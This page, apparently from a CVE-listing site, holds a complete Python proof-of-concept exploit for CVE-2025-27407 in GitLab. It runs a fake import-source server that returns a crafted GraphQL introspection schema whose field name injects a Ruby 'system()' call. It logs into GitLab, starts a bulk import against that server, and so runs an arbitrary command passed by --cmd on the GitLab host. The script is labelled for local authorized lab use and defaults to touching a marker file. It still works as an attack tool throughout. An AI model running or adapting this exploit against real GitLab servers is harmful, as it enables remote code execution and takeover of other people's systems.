5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc_host_port_cmd.py PY
#!/usr/bin/env python3
import argparse
import html
import http.cookiejar
import json
import re
import shlex
import threading
import time
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


# Default value for --cmd and for EvilSourceHandler.payload_command.
DEFAULT_CMD = "touch /tmp/cve_2025_27407_gitlab_marker"


def log(message):
    """Print ``message`` on its own line and flush stdout immediately."""
    print(message, end="\n", flush=True)


def scalar_field(name, scalar):
    """Return an introspection-style field entry for a scalar-typed field.

    Args:
        name: Value stored under the entry's ``"name"`` key.
        scalar: Name of the scalar type placed in the ``"type"`` reference.

    Returns:
        A new dict with no description, an empty ``args`` list and the
        deprecation keys set to "not deprecated".
    """
    type_ref = dict(kind="SCALAR", name=scalar, ofType=None)
    entry = dict(name=name, description=None, args=[], type=type_ref)
    entry["isDeprecated"] = False
    entry["deprecationReason"] = None
    return entry


def malicious_schema(command):
    """Build the body returned for GraphQL introspection requests.

    Args:
        command: String embedded (via ``repr``) into the name of the single
            input field of the ``ExploitInput`` type.

    Returns:
        A dict shaped like an introspection result (``data.__schema``) that
        declares a ``Query`` type with one ``group(fullPath: ID)`` field, a
        ``Group`` object type made of scalar fields, and the ``ExploitInput``
        input object carrying the crafted field name.
    """
    # Multi-line field name; ``!r`` inserts the command as a quoted, escaped literal.
    payload_name = f"safe\nend\nsystem({command!r})\ndef safe2"

    return {
        "data": {
            "__schema": {
                "queryType": {"name": "Query"},
                "mutationType": None,
                "subscriptionType": None,
                "types": [
                    {
                        "kind": "OBJECT",
                        "name": "Query",
                        "description": None,
                        "fields": [
                            {
                                "name": "group",
                                "description": None,
                                "args": [
                                    {
                                        "name": "fullPath",
                                        "description": None,
                                        "type": {"kind": "SCALAR", "name": "ID", "ofType": None},
                                        "defaultValue": None,
                                    }
                                ],
                                "type": {"kind": "OBJECT", "name": "Group", "ofType": None},
                                "isDeprecated": False,
                                "deprecationReason": None,
                            }
                        ],
                        "interfaces": [],
                    },
                    {
                        "kind": "OBJECT",
                        "name": "Group",
                        "description": None,
                        # Same field names as the canned "group" reply served for normal queries.
                        "fields": [
                            scalar_field("id", "ID"),
                            scalar_field("name", "String"),
                            scalar_field("path", "String"),
                            scalar_field("description", "String"),
                            scalar_field("visibility", "String"),
                            scalar_field("emailsDisabled", "Boolean"),
                            scalar_field("lfsEnabled", "Boolean"),
                            scalar_field("mentionsDisabled", "Boolean"),
                            scalar_field("projectCreationLevel", "String"),
                            scalar_field("requestAccessEnabled", "Boolean"),
                            scalar_field("requireTwoFactorAuthentication", "Boolean"),
                            scalar_field("shareWithGroupLock", "Boolean"),
                            scalar_field("subgroupCreationLevel", "String"),
                            scalar_field("twoFactorGracePeriod", "Int"),
                        ],
                        "interfaces": [],
                    },
                    {
                        "kind": "INPUT_OBJECT",
                        "name": "ExploitInput",
                        "description": None,
                        "inputFields": [
                            {
                                "name": payload_name,
                                "description": None,
                                "type": {"kind": "SCALAR", "name": "String", "ofType": None},
                                "defaultValue": None,
                            }
                        ],
                    },
                ],
                "directives": [],
            }
        }
    }


class EvilSourceHandler(BaseHTTPRequestHandler):
    """HTTP handler that answers as the import source for the lab run.

    A handful of REST paths get canned JSON replies; ``/api/graphql`` gets
    either ``malicious_schema(payload_command)`` (introspection requests) or
    a fixed ``group`` record (anything else). State is kept on the class
    because ``http.server`` instantiates one handler per request.
    """

    # Command embedded into the schema served for introspection requests.
    payload_command = DEFAULT_CMD
    # Human-readable record of handled requests, shared by all handler instances.
    events = []
    # Set the first time an introspection request reaches /api/graphql.
    saw_introspection = threading.Event()

    # Canned reply for any non-introspection GraphQL query.
    _GROUP_RESPONSE = {
        "data": {
            "group": {
                "id": "gid://gitlab/Group/1",
                "name": "evilgroup",
                "path": "evilgroup",
                "description": "lab group",
                "visibility": "private",
                "emailsDisabled": False,
                "lfsEnabled": True,
                "mentionsDisabled": False,
                "projectCreationLevel": "developer",
                "requestAccessEnabled": False,
                "requireTwoFactorAuthentication": False,
                "shareWithGroupLock": False,
                "subgroupCreationLevel": "owner",
                "twoFactorGracePeriod": 48,
            }
        }
    }

    def send_json(self, status, body):
        """Send ``body`` JSON-encoded with HTTP ``status`` and a matching Content-Length."""
        data = json.dumps(body).encode()
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def event(self, message):
        """Append ``message`` to the shared event list and echo it through ``log``."""
        EvilSourceHandler.events.append(message)
        log(f"[evil-source] {message}")

    def _read_body(self):
        """Return the request body as text, or ``None`` if Content-Length is unusable.

        A non-numeric length would raise ``ValueError`` and a negative one
        would make ``rfile.read`` block until the peer closes the connection,
        so both are rejected instead of being passed to ``read``.
        """
        try:
            length = int(self.headers.get("Content-Length", "0"))
        except ValueError:
            return None
        if length < 0:
            return None
        return self.rfile.read(length).decode(errors="replace")

    def do_GET(self):
        """Serve the canned REST replies; every other path gets a JSON 404."""
        path = self.path.split("?", 1)[0]
        if path in ("/api/v4/version", "/api/v4/metadata"):
            reply = {"version": "16.11.8", "revision": "cve-2025-27407-lab", "enterprise": False}
        elif path == "/api/v4/personal_access_tokens/self":
            reply = {"id": 1, "name": "lab-token", "scopes": ["api"], "active": True}
        elif path.endswith("/export_relations/status"):
            reply = {"relations": []}
        else:
            self.event(f"GET {path} -> 404")
            self.send_json(404, {"message": "not found"})
            return
        self.event(f"GET {path}")
        self.send_json(200, reply)

    def do_POST(self):
        """Serve ``/api/graphql``; every other path gets a JSON 404."""
        path = self.path.split("?", 1)[0]
        # The body is read for every path, before routing.
        body = self._read_body()
        if body is None:
            self.event(f"POST {path} -> 400 invalid Content-Length")
            self.send_json(400, {"message": "invalid Content-Length"})
            return
        if path == "/api/graphql":
            # Introspection is detected by a plain substring check on the raw body.
            if "__schema" in body or "IntrospectionQuery" in body:
                EvilSourceHandler.saw_introspection.set()
                self.event(f"POST /api/graphql introspection -> malicious schema; command={self.payload_command!r}")
                self.send_json(200, malicious_schema(self.payload_command))
            else:
                self.event("POST /api/graphql normal query")
                self.send_json(200, self._GROUP_RESPONSE)
        elif path.endswith("/export_relations"):
            self.event(f"POST {path} -> 404")
            self.send_json(404, {"message": "export intentionally not implemented"})
        else:
            self.event(f"POST {path} -> 404")
            self.send_json(404, {"message": "not found"})

    def log_message(self, _format, *_args):
        """Suppress the base class's per-request logging; ``event`` reports instead."""
        return


def start_evil_source(listen_host, listen_port, command):
    """Reset the handler's shared state and start serving in a daemon thread.

    Args:
        listen_host: Address the HTTP server binds to.
        listen_port: TCP port the HTTP server binds to.
        command: Stored as ``EvilSourceHandler.payload_command``.

    Returns:
        The running ``ThreadingHTTPServer``; the caller is responsible for
        stopping it.
    """
    handler = EvilSourceHandler
    handler.payload_command = command
    handler.events = []
    handler.saw_introspection.clear()

    server = ThreadingHTTPServer((listen_host, listen_port), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    log(f"[*] evil source listening on {listen_host}:{listen_port}")
    return server


def wait_for_introspection(timeout_seconds):
    """Block until an introspection request has been seen or the timeout expires.

    A single ``Event.wait`` replaces the former wall-clock polling loop, so
    the wait no longer depends on ``time.time()``, cannot overshoot the
    timeout by up to a second, and reports success when the event is already
    set even if ``timeout_seconds`` is 0.

    Args:
        timeout_seconds: Maximum time to wait; negative values are treated as 0.

    Returns:
        ``True`` if ``EvilSourceHandler.saw_introspection`` was set in time,
        ``False`` otherwise.
    """
    log(f"[*] keeping evil source alive for up to {timeout_seconds}s while GitLab workers run")
    if EvilSourceHandler.saw_introspection.wait(timeout=max(0, timeout_seconds)):
        log("[+] GitLab reached /api/graphql introspection over HTTP")
        return True
    log("[-] timed out waiting for /api/graphql introspection")
    return False


class GitLabSession:
    """Cookie-keeping HTTP client bound to one base URL."""

    def __init__(self, base_url):
        """Store ``base_url`` without trailing slashes and build a cookie-aware opener."""
        self.base_url = base_url.rstrip("/")
        jar = http.cookiejar.CookieJar()
        self.http = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))

    def request(self, method, path, data=None, headers=None, json_body=False, allow_http_error=False):
        """Send one request and return ``(status, final_url, headers, text)``.

        Args:
            method: HTTP method name.
            path: Absolute ``http://`` / ``https://`` URL, or a path appended
                to ``base_url``.
            data: Optional payload; form-encoded unless ``json_body`` is true.
            headers: Optional extra headers, applied over the default User-Agent.
            json_body: Encode ``data`` as JSON instead of a form.
            allow_http_error: Return HTTP error responses instead of raising.

        Raises:
            urllib.error.HTTPError: On an HTTP error status when
                ``allow_http_error`` is false.
        """
        # Match full scheme prefixes so a relative path that merely begins
        # with "http" is still resolved against base_url.
        is_absolute = path.startswith(("http://", "https://"))
        url = path if is_absolute else self.base_url + path

        request_headers = {"User-Agent": "cve-2025-27407-host-port-cmd-poc"}
        if headers:
            request_headers.update(headers)

        body = None
        if data is not None:
            if json_body:
                body = json.dumps(data).encode()
                request_headers["Content-Type"] = "application/json"
            else:
                body = urllib.parse.urlencode(data, doseq=True).encode()
                request_headers["Content-Type"] = "application/x-www-form-urlencoded"

        request = urllib.request.Request(url, data=body, method=method, headers=request_headers)
        try:
            # The context manager closes the response once the body has been read.
            with self.http.open(request, timeout=90) as response:
                return response.status, response.geturl(), response.headers, response.read().decode(errors="replace")
        except urllib.error.HTTPError as exc:
            if not allow_http_error:
                raise
            try:
                return exc.code, exc.geturl(), exc.headers, exc.read().decode(errors="replace")
            finally:
                # HTTPError wraps the error response; close it like a normal one.
                exc.close()


def csrf_from(body):
    """Extract a CSRF token from an HTML page.

    Three markup shapes are tried in a fixed order: a ``csrf-token`` meta tag
    with ``name`` before ``content``, the same tag with the attributes
    swapped, and an ``authenticity_token`` form input. The first shape that
    matches anywhere in ``body`` wins.

    Returns:
        The token with HTML entities unescaped.

    Raises:
        RuntimeError: If none of the shapes is present.
    """
    candidates = (
        r'name="csrf-token"\s+content="([^"]+)"',
        r'content="([^"]+)"\s+name="csrf-token"',
        r'name="authenticity_token"\s+value="([^"]+)"',
    )
    # Lazy generator: later patterns are only searched if earlier ones miss.
    hits = (re.search(regex, body) for regex in candidates)
    found = next((hit for hit in hits if hit), None)
    if found is None:
        raise RuntimeError("could not find CSRF token")
    return html.unescape(found.group(1))


def trigger_import(gitlab, source_url, username, password):
    """Log in to GitLab and submit a bulk import that points at ``source_url``.

    Args:
        gitlab: ``GitLabSession`` used for every request (keeps the cookies).
        source_url: URL submitted as ``bulk_import_gitlab_url``.
        username: Value sent as ``user[login]``.
        password: Value sent as ``user[password]``.

    Returns:
        The HTTP status of the final ``POST /import/bulk_imports`` request.

    Raises:
        RuntimeError: If no CSRF token is found on a fetched page, if the
            login check fails, or if the configure step returns status >= 400.
    """
    # Step 1: fetch the sign-in page to obtain a CSRF token for the login form.
    status, _, _, body = gitlab.request("GET", "/users/sign_in")
    log(f"[*] sign-in page status={status}")
    csrf = csrf_from(body)

    # Step 2: submit the login form.
    status, url, _, body = gitlab.request(
        "POST",
        "/users/sign_in",
        {
            "authenticity_token": csrf,
            "user[login]": username,
            "user[password]": password,
            "user[remember_me]": "0",
        },
        {"Referer": f"{gitlab.base_url}/users/sign_in"},
        allow_http_error=True,
    )
    log(f"[*] login status={status} final_url={url}")
    # NOTE(review): a response that ends on the sign-in page with status 200
    # is not treated as a failed login by this check — confirm this is intended.
    if "users/sign_in" in url and status != 200:
        raise RuntimeError("login failed")

    # Step 3: register the source URL and a placeholder token, using the CSRF
    # token from the page returned by the login request.
    csrf = csrf_from(body)
    status, url, _, body = gitlab.request(
        "POST",
        "/import/bulk_imports/configure",
        {
            "authenticity_token": csrf,
            "bulk_import_gitlab_url": source_url,
            "bulk_import_gitlab_access_token": "fake-api-token-with-api-scope",
        },
        {"Referer": f"{gitlab.base_url}/import/bulk_imports/status"},
        allow_http_error=True,
    )
    log(f"[*] configure status={status} final_url={url}")
    if status >= 400:
        raise RuntimeError(f"configure failed: {body[:500]}")

    # Step 4: fetch a fresh CSRF token and create the import as JSON.
    status, _, _, body = gitlab.request("GET", "/")
    csrf = csrf_from(body)
    # The timestamp suffix gives each run a different destination name.
    destination_name = f"evilgroup-copy-{int(time.time())}"
    status, url, _, body = gitlab.request(
        "POST",
        "/import/bulk_imports",
        {
            "bulk_import": [
                {
                    "source_type": "group_entity",
                    "source_full_path": "evilgroup",
                    "destination_name": destination_name,
                    "destination_namespace": "",
                    "migrate_projects": False,
                    "migrate_memberships": False,
                }
            ]
        },
        {
            "Referer": f"{gitlab.base_url}/import/bulk_imports/status",
            "X-CSRF-Token": csrf,
            "Accept": "application/json",
        },
        json_body=True,
        allow_http_error=True,
    )
    log(f"[*] create/import trigger status={status} final_url={url}")
    # Only the first 2000 characters of the response are echoed.
    log(body[:2000])
    return status


def main():
    """Parse the command line, start the source server, trigger the import and report.

    The server is always stopped on exit, and its listening socket is now
    released with ``server_close()`` (``shutdown()`` alone only ends the
    ``serve_forever`` loop).
    """
    parser = argparse.ArgumentParser(description="CVE-2025-27407 GitLab Direct Transfer PoC for local authorized lab use")
    parser.add_argument("--host", required=True, help="GitLab host, e.g. 127.0.0.1")
    parser.add_argument("--port", type=int, required=True, help="GitLab HTTP port, e.g. 18080")
    parser.add_argument("--cmd", default=DEFAULT_CMD, help=f"Command to run in GitLab runtime, default: {DEFAULT_CMD!r}")
    parser.add_argument("--scheme", default="http", choices=("http", "https"), help="GitLab scheme")
    parser.add_argument("--username", default="root", help="GitLab username")
    parser.add_argument("--password", default="Cve27407Password!", help="GitLab password")
    parser.add_argument("--listen-host", default="0.0.0.0", help="Evil source bind host")
    parser.add_argument("--listen-port", type=int, default=8001, help="Evil source bind port")
    parser.add_argument("--wait-seconds", type=int, default=90, help="How long to keep the evil source alive after triggering import")
    parser.add_argument(
        "--source-url",
        default=None,
        help="URL GitLab should use to reach evil source; default uses host.containers.internal with --listen-port",
    )
    args = parser.parse_args()

    # Without --source-url, point GitLab at host.containers.internal on the listen port.
    source_url = args.source_url or f"http://host.containers.internal:{args.listen_port}"
    gitlab_url = f"{args.scheme}://{args.host}:{args.port}"

    log(f"[*] target GitLab: {gitlab_url}")
    log(f"[*] source URL as seen by GitLab: {source_url}")
    log(f"[*] test command: {args.cmd!r}")
    log(f"[*] shell-safe display: {shlex.join(['sh', '-lc', args.cmd])}")

    server = start_evil_source(args.listen_host, args.listen_port, args.cmd)
    try:
        trigger_import(GitLabSession(gitlab_url), source_url, args.username, args.password)
        wait_for_introspection(args.wait_seconds)
        log("[*] trigger sent; verify the command side effect on the GitLab runtime")
        if EvilSourceHandler.events:
            log("[*] evil source observed requests:")
            # Only the 20 most recent events are shown.
            for event in EvilSourceHandler.events[-20:]:
                log(f"    {event}")
    finally:
        server.shutdown()
        # Release the listening socket; shutdown() leaves it open.
        server.server_close()


# Run main() only when executed as a script, not when imported.
if __name__ == "__main__":
    main()